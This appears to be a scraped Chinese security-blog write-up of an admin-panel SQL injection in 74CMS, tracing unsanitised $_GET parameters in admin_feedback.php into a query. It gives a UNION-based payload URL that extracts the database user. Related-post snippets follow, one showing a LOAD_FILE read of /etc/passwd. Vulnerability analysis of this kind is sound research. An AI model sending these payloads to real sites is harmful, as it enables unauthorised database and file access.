sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网
摘要
漏洞文件:admin/admin_feedback.php代码82行: 跟下get_report_list: $_GET[‘reporttype’]
漏洞文件:admin/admin_feedback.php
代码82行:
if (!empty($_GET['reporttype'])) { $wheresql=empty($wheresql)?" WHERE r.report_type=".$_GET['reporttype']:$wheresql." AND r.report_type=".$_GET['reporttype']; } if (!empty($_GET['audit'])) { $wheresql=empty($wheresql)?" WHERE r.audit=".$_GET['audit']:$wheresql." AND r.audit=".$_GET['audit']; } $total_val=$db->get_total($total_sql); $page = new page(array('total'=>$total_val, 'perpage'=>$perpage,'getarray'=>$_GET)); $currenpage=$page->nowindex; $offset=($currenpage-1)*$perpage; $list = get_report_list($offset,$perpage,$joinsql.$wheresql.$oederbysql,$type); $smarty->assign('pageheader',"举报信息"); $smarty->assign('list',$list); $smarty->assign('page',$page->show(3));
跟下get_report_list:
function get_report_list($offset,$perpage,$get_sql= '',$type) { global $db; $limit=" LIMIT ".$offset.','.$perpage; if($type==1){ $result = $db->query("SELECT r.*,m.username FROM ".table('report')." AS r ".$get_sql.$limit); while($row = $db->fetch_array($result)) { $row['jobs_url']=url_rewrite('QS_jobsshow',array('id'=>$row['jobs_id'])); $row_arr[] = $row; } }else{ $result = $db->query("SELECT r.*,m.username FROM ".table('report_resume')." AS r ".$get_sql.$limit); while($row = $db->fetch_array($result)) { $row['resume_url']=url_rewrite('QS_resumeshow',array('id'=>$row['resume_id'])); $row_arr[] = $row; } } return $row_arr; }
$_GET['reporttype']
$_GET['audit']
没有’包含。
构造payload:
admin/admin_feedback.php?act=report_list&audit=1%20union%20select%201,2,3,4,5,6,7,user(),9,10%23
sql注入pythonpoco_骑士CMS后台SQL注入 | CN-SEC 中文网相关推荐
- 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
文章目录 74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389) 1.74CMS(骑士CMS)简介 2.漏洞描述 3.影响版本 4.fofa查询语句 5.漏洞复现 6.POC& ...
- sql注入pythonpoco_.NET EF(Entity Framework)详解
一丶Entity Framework (一)EF简介 (1)ORM:Object Relation Mapping ,通俗说:用操作对象的方式来操作数据库. (2)插入数据库不再是执行Insert,而 ...
- groovy怎样从sql语句中截取表名_sql注入mysql篇
SQL注入 __0x01 ♛Sql注入原理 Sql注入顾名思义是没有对用户输入的参数进行过滤导致测试者可以将一段非正常语句插入到查询语句中,由web应用带入到数据库中执行,从而读取数据库中的数据. _ ...
- SQL注入 1-3_基于post报错注入
** SQL注入 1-3_基于post报错注入 ** 一.概念 客户端提交参数基于post 1.基于post注入不会拼接到url 2.相对get提交参数更加安全 3.但是依然可以使用代理(中间人)截断 ...
- sql注释符注入防御_读《SQL注入***与防御》笔记
' //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE('/etc/pas ...
- SQL注入:SQL注入类型(手动)SQL注入的检测
一.SQL注入流程 1.判断是否有SQL注入漏洞(检测) 2.判断操作系统.数据库和web应用类型 3.获取数据库信息,包括管理员信息及拖库 4.加密信息破解,sqlmap可自动破解 5.提升权限,获 ...
- sql注入漏洞,应屏蔽SQL注入攻击
2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1 from dual where ...
- 什么是SQL注入攻击以及如何防止SQL注入攻击
一.什么是SQL注入攻击? CASE 1 : 模拟用户登陆案例 (1)准备数据 use jt_db; create table user( id int primary key auto_increm ...
- 初学SQL 注入之常见的几种注入类型
SQL注入原理 老生常谈,SQL注入攻击的本质就是把用户输入的参数当做SQL语句来执行,Web应用程序对用户输入数据的合法性没有判断和过滤,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作. ...
最新文章
- 来自 Google 的 R 语言编码风格指南
- 写一下这两天的生活吧!开学了,也没有多少时间了
- matlab div矩阵运算,【求助】多维矩阵求和运算!!
- 消息队列重要机制讲解以及MQ设计思路(kafka、rabbitmq、rocketmq)
- Linux_linux常用工具(git,vim ,gcc ,gdb,权限)超详解
- 论文浅尝 - AAAI2020 | 从异质外部知识库中进行基于图的推理实现常识知识问答...
- vivoy9s怎么设置返回键_vivoy9s怎么设置返回键 可以使用虚拟导航键
- 的优缺点_浅谈桉木家具的优缺点
- 信息学奥赛一本通(1010:计算分数的浮点数值)
- CSE强契约模式常见问题和应对策略
- 读书笔记--Head First PHPMySql 目录
- 27条好赚钱副业的途径:自己也能不用上班月入2万+!
- CSS ::backdrop
- 本本CPU控制让游戏3D效果最佳境界
- 付出不亚于任何人的努力
- 阿里云配置DNS服务器
- e.CommandArgument值的设定
- CouchDB系列 - 安装CouchDB
- USRP B210同步采集
- Android问题解决-部分机型上传图片失败